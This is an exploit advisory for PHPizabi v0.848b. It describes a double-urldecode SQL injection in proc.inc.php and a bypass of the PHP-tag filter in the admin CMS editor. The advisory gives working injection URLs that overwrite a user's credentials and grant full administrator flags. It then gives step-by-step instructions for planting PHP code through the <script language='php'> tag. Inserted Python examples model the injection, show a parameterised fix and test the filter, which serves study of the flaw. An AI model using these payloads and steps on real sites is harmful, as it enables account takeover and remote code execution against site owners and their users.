
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)



--------------------------------------------------------------------------------
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini
independent)
by Nine:Situations:Group::bookoo
--------------------------------------------------------------------------------
our site: http://retrogod.altervista.org/ 
software site: http://www.phpizabi.net/ 
--------------------------------------------------------------------------------

vulnerability:
sql injection in /theme/default/proc.inc.php

 LoadThis($buffer);
 // HANDLE POSTED NOTEPAD DATA ///////////////////////////////////////////////////////
 if (isset($_GET["notepad_body"])) {
     myQ("UPDATE `[x]users` SET `notepad_body` = '".urldecode($_GET["notepad_body"])."' WHERE `id`='".me("id")."'");
     me("flush");
 }
..

note the urldecode(): PHP already decodes the query string once when it fills $_GET, so a quote sent as %2527 arrives in $_GET as the three harmless characters %27. magic_quotes_gpc (if enabled) sees no quote to escape, and the literal ' only appears inside urldecode(), right before the value is concatenated into the UPDATE. That is why the injection works whatever magic_quotes_gpc is set to in php.ini.

exploitation, manual:

injection urls:

change username and password of an existing user:
[sql]', username = 'bookoo', password = md5('pass') WHERE username = 'user'/*
which becomes:
http://host/path_to_phpizabi/?notepad_body=%2527,%20username%20=%20%2527bookoo%2527,%20password%20=%20md5(%2527pass%2527)%20WHERE%20username%20=%20%2527user%2527/*

grant yourself admin rights:
[sql]', is_moderator = 1, is_administrator = 1, is_superadministrator = 1 WHERE username = 'bookoo'/*
which becomes:

http://host/path_to_phpizabi/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%20%2527bookoo%2527/*
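The following Python script is an added example, not code from the advisory or from PHPizabi. It models the notepad_body injection end to end: the decode PHP performs while filling $_GET, the optional magic_quotes_gpc addslashes() step, the application's own urldecode(), and the UPDATE that myQ() would run, executed against an in-memory SQLite stand-in for the `[x]users` table. The column names follow the advisory; the table name `users`, the rows, the ids and the attacker id returned by me("id") are constructed assumptions. The "grant yourself admin rights" parameter above is used verbatim.

```python
"""
Double-decoded SQL injection from /theme/default/proc.inc.php, modelled in Python.
Stand-in for the PHP pipeline: $_GET decode -> magic_quotes_gpc -> urldecode() -> myQ().
"""
import sqlite3
from urllib.parse import unquote

# Constructed stand-in for `[x]users`: id 7 is the attacker's own unprivileged
# account (what me("id") returns), id 1 an existing administrator.
SCHEMA = """
CREATE TABLE users (
    id INTEGER PRIMARY KEY,
    username TEXT,
    password TEXT,
    is_moderator INTEGER NOT NULL DEFAULT 0,
    is_administrator INTEGER NOT NULL DEFAULT 0,
    is_superadministrator INTEGER NOT NULL DEFAULT 0,
    notepad_body TEXT NOT NULL DEFAULT ''
);
INSERT INTO users (id, username, password, is_moderator, is_administrator, is_superadministrator)
VALUES (1, 'admin', 'x', 1, 1, 1), (7, 'bookoo', 'y', 0, 0, 0);
"""
ATTACKER_ID = 7

# The advisory's "grant yourself admin rights" URL parameter: quotes double-encoded
# (%2527 -> %27 -> '), spaces encoded once.
DOUBLE_ENCODED = ("%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,"
                  "%20is_superadministrator%20=%201%20WHERE%20username%20=%20%2527bookoo%2527/*")
# The same payload encoded only once, i.e. what a naive attacker would send.
SINGLE_ENCODED = unquote(DOUBLE_ENCODED)


def addslashes(s: str) -> str:
    """PHP addslashes(), which magic_quotes_gpc applied to every GET value."""
    return "".join(
        "\\" + ch if ch in "'\"\\" else ("\\0" if ch == "\x00" else ch)
        for ch in s
    )


def build_query(raw_param: str, me_id: int, magic_quotes: bool) -> str:
    """Reproduce the SQL string proc.inc.php hands to myQ()."""
    value = unquote(raw_param)       # 1. PHP decodes the query string into $_GET
    if magic_quotes:
        value = addslashes(value)    # 2. magic_quotes_gpc = On escapes the quotes it can see
    value = unquote(value)           # 3. the application's urldecode() decodes a second time
    return f"UPDATE users SET notepad_body = '{value}' WHERE id='{me_id}'"


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def privileges(conn: sqlite3.Connection, username: str) -> tuple:
    row = conn.execute(
        "SELECT is_moderator, is_administrator, is_superadministrator "
        "FROM users WHERE username = ?", (username,)).fetchone()
    return tuple(row)


def run_vulnerable(raw_param: str, magic_quotes: bool = True) -> tuple:
    """Execute the concatenated UPDATE and return bookoo's flags afterwards.

    SQLite accepts the trailing unterminated /* comment like MySQL does, so the
    double-encoded payload behaves the same here. Do not draw conclusions from
    running the single-encoded payload with magic_quotes=True: MySQL honours the
    \\' escape addslashes() produced, SQLite does not, so for that case look at
    the string build_query() returns instead of executing it.
    """
    conn = fresh_db()
    conn.execute(build_query(raw_param, ATTACKER_ID, magic_quotes))
    return privileges(conn, "bookoo")


def run_parameterised(raw_param: str) -> tuple:
    """The fix: bind the value. The double decode stays, but the result is only text."""
    conn = fresh_db()
    value = unquote(unquote(raw_param))
    conn.execute("UPDATE users SET notepad_body = ? WHERE id = ?", (value, ATTACKER_ID))
    body = conn.execute("SELECT notepad_body FROM users WHERE id = ?",
                        (ATTACKER_ID,)).fetchone()[0]
    return privileges(conn, "bookoo"), body


if __name__ == "__main__":
    print("single-encoded, magic_quotes on :", build_query(SINGLE_ENCODED, ATTACKER_ID, True))
    print("double-encoded, magic_quotes on :", build_query(DOUBLE_ENCODED, ATTACKER_ID, True))
    print("flags after vulnerable UPDATE   :", run_vulnerable(DOUBLE_ENCODED))
    print("flags/body, parameterised       :", run_parameterised(DOUBLE_ENCODED))
```

The first printed query shows the single-encoded payload arriving as `'\', is_moderator = 1, ...`, which MySQL reads as an escaped quote inside the string; the second shows the double-encoded one arriving as `'', is_moderator = 1, ...` with the original `WHERE id='7'` swallowed by the `/*`. The parameterised version keeps urldecode() and still stores the payload harmlessly, which is the point: the defence is binding, not escaping.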

navigate:

http://host/path_to_phpizabi/?L=admin.index 

boom !

now go to:

http://host/path_to_phpizabi/?L=admin.cms.edit&id={cms.file} 

use the <script language="php"> ... </script> opening and closing tag style for the PHP you put in the page body, for example:

<script language="php"> ... </script>

(it is always available, whatever short_open_tag or asp_tags are set to in php.ini, see: http://www.php.net/manual/en/language.basic-syntax.phpmode.php)
because of that preg_replace() in /modules/admin/cms/edit.php, which strips <?php, <?, <% and their closing tags but not this form:

..
	if (isset($_POST["Submit"])) {
		if ($handle = fopen("modules/cms/{$_GET["id"]}.php", "w")) {
			$body = "\n"
				.preg_replace('#(<\\?.*\\?>)|(<%.*%>)|<\\?php|<\\?|\\?>|<%|%>#si', NULL, stripslashes($_POST["body"][0]))
				."\n";
			fwrite($handle, $body);
			fclose($handle);
..

which is bypassed.
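To see exactly what that filter removes and what it lets through, here is an added Python example (not code from the advisory or from PHPizabi) that re-implements the preg_replace() pattern with the re module and runs one sample body per PHP open-tag style through it. The pattern is the advisory's PCRE `#(<\?.*\?>)|(<%.*%>)|<\?php|<\?|\?>|<%|%>#si` with flags s and i mapped to re.S | re.I; the sample bodies and the script-tag detection regex are constructed for this example.

```python
"""
The edit.php PHP-tag filter, re-implemented, and the four open-tag styles run through it.
"""
import re

# edit.php's PCRE pattern, PHP single-quoted '\\?' unescaped to '\?'; #si -> re.S | re.I.
PHP_TAG_FILTER = re.compile(r"(<\?.*\?>)|(<%.*%>)|<\?php|<\?|\?>|<%|%>", re.S | re.I)

# Constructed approximation of the PHP (pre-7) scanner rule for the script-style open
# tag. Used here only as a detection aid for reviewing stored CMS files, not as a
# replacement denylist: the fix is to stop writing user input into an included .php file.
SCRIPT_OPEN_TAG = re.compile(r"""<script\s+language\s*=\s*(?:"php"|'php'|php)\s*>""", re.I)

# Constructed sample bodies, one per open-tag style.
SAMPLES = {
    "standard": '<?php echo "x"; ?>',
    "short":    '<? echo "x"; ?>',                              # needs short_open_tag=On
    "asp":      '<% echo "x"; %>',                              # needs asp_tags=On
    "script":   '<script language="php">echo "x";</script>',  # no php.ini setting involved
}


def strip_php_tags(body: str) -> str:
    """The filtering step edit.php applies before writing modules/cms/<id>.php.

    Note the greedy '.*' with the s flag: everything between the first '<?' and the
    last '?>' in the body is removed, not just the tags.
    """
    return PHP_TAG_FILTER.sub("", body)


def still_executable(body: str) -> bool:
    """After the filter has run, is there still an open tag PHP would honour?"""
    filtered = strip_php_tags(body)
    return bool(PHP_TAG_FILTER.search(filtered) or SCRIPT_OPEN_TAG.search(filtered))


def filter_report(samples=SAMPLES) -> dict:
    """Map each sample name to (what gets written to disk, whether PHP would run it)."""
    return {name: (strip_php_tags(body), still_executable(body))
            for name, body in samples.items()}


if __name__ == "__main__":
    for name, (written, runs) in filter_report().items():
        print(f"{name:9s} written={written!r:45s} executable={runs}")
```

Three of the four styles come out empty; the script-style body is written to modules/cms/<id>.php byte for byte and is interpreted by PHP when the page is requested. A longer denylist does not change the design problem: administrator-supplied page bodies belong in data (a database row or a non-PHP file) that fixed code reads and outputs, not in a file that PHP includes.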

save changes and navigate:

http://host/path_to_phpizabi/?L=cms._cms_file_ 

to see the output...

now visit the log page:

http://host/path_to_phpizabi/?L=admin.logs.logs 

..
--------------------------------------------------------------------------------

original url: http://retrogod.altervista.org/9sg_phpizabi_848bc1.html 
